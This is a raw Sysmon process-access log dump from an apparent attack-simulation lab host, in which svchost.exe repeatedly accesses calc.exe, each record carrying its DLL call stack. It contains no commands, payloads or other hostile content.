22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360577Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360576Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360575Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360574Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360573Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360572Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360571Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360570Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360569Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360568Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360567Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360566Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360565Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360564Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360563Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360562Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360561Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360560Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360559Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360558Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360557Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360556Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 